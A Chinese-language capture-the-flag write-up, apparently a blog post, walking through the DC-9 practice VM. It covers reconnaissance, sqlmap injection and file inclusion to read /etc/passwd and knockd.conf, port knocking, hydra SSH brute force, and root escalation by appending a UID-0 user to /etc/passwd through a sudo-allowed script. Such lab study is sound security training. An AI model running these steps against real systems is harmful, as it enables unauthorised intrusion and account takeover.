【DC9靶场通关详细记录】

环境搭建

  1. DC8主机靶场,点击下载
  2. 导入下载文件,如果报错点击重试
  3. 更改kali和DC8靶场的网络配置为统一的连接模式

信息收集

扫描确定IP

使用arp-scan扫描网络,确定靶机IP,使用以下命令

arp-scan -l

image.png

扫描端口以及服务

使用nmap对靶机进行扫描,确定开启的端口,以及端口对应的服务,使用以下命令

nmap -sV -p- -A 192.168.223.130

image.png

指纹识别

尝试访问靶机开放的端口80,是一个网站,可以尝试对靶机进行指纹识别,使用以下命令

whatweb -v 192.168.223.130

image.png

目录爆破

靶机上搭建了一个网站,尝试进行目录爆破,使用一下命令

dirsearch -u 192.168.223.130

image.png

查找漏洞

尝试搜索框是否注入

  1. 通过burp抓包发现此处有sql注入点

image.png

  1. 将search的数据设置为1,并保存数据包使用sqlmap

sqlmap -r sql2.txt

在sqlmap进行注入的时候会弹出三个选项,进行以下选择
image.png

  1. sqlmap注入成功,提示是联合注入和时间盲注

image.png

当前数据库爆破

  1. 查看当前数据库

image.png

  1. 查看所有数据库

image.png

  1. 查看当前数据库所有表

image.png

  1. 查看当前数据库的user表的列

image.png

  1. 查看表内容,获取当账号和加密的密码

image.png

破解加密密码登录,利用文件包含漏洞

  1. 破解密码

image.png

  1. 登录网站,多了一个增加的功能,网站下面提示了file does not exist(文件不存在),可能存在文件包含漏洞

image.png

  1. 尝试使用file参数,读取文件/etc/passwd,显示文件有许多用户

image.png

对另一数据库爆破

  1. 查看看到一组用户名和密码

image.png

  1. 对比passwd文件发现用户名是一样的

image.png

  1. 将用户名和密码dump出来,分别单独保存到单个文件中

image.png

端口敲门knockd

  1. 信息收集的端口扫描到ssh的22端口的状态是filtered,可以端口敲门打开端口
  2. 尝试文件包含漏洞,查看是否有knockd的配置文件

knockd的配置文件路径
/etc/knockd.conf

image.png

  1. 按照配置文件的端口进行敲门,打开靶机的ssh端口
  1. 使用nc、nmap、knockd都可以敲门成功
nc  192.168.223.130  7469
nc  192.168.223.130  8475
nc  192.168.223.130  9842apt-get install  knockd
knock -v 192.168.223.130  7469 8475 9842

image.png

通过ssh进行提权

hydra破解ssh的账号密码

  1. 通过数据库的账号密码破解ssh的账号密码
hydra -L user.txt -P pass.txt  ssh://192.168.223.130

image.png

  1. 尝试登陆,在使用最后一个用户登录时存在一个存放密码的隐藏文件

image.png

  1. 将该组密码加入密码字典重新破解,出现新的一个账户密码

image.png

使用新的账号尝试进行提权

  1. 切换到新用户中fredf

image.png

  1. 尝试提权

sudo -l //出现以root权限执行的文件

image.png

  1. 访问该文件,查看该文件的用法

image.png

  1. 查找文件用法提示的脚本,脚本的功能:将参数为1的内容写到参数2中

./test.py 1文件 2文件
将1文件的内容写入2文件

image.png

创造条件使用该脚本

  1. 生成md5密码创建类似passwd的文件写入创建的用户
  • openssl passwd -1 -salt admin 123456
    • -1 :表示采用的是MD5加密算法
    • -salt:指定salt值,不使用随机产生的salt。在使用加密算法进行加密时,即使密码一样,salt不一样,所计算出来的hash值也不一样,除非密码一样,salt值也一样,计算出来的hash值才一样。salt为8字节的字符串。
1. openssl passwd -1 -salt admin  123456
2. echo 'admin:加密后的密码:0:0:admin:/root:/bin/bash'  >> /tmp/passwd
3. echo "admin:$(openssl passwd 12345):0:0:admin:/root:/bin/bash"  >> /tmp/passwd

image.png

  1. 使用该脚本
./test /tmp/passwd  /etc/passwd //不成功
sudo ./test  /tmp/passwd  /etc/passwd

image.png

  1. 查看passwd文件,查看创建的用户是否追加进去

image.png

提权成功获得flag

su admin

image.png

总结

  1. 文件包含漏洞,读取配置文件
  2. knockd端口敲门

配置文件路径/etc/knockd.conf

nc  192.168.223.130  7469
nc  192.168.223.130  8475
nc  192.168.223.130  9842apt-get install  knockd
knock -v 192.168.223.130  7469 8475 9842
  1. hydra破解ssh登录密码
hydra -L 用户名字典 -P 密码字典  ssh://ip
  1. 利用脚本提权,根据脚本的使用方法构造相关环境进行利用,获取权限

主机渗透DC1-9靶场已经完成 😃

  • 27
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榕小树

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值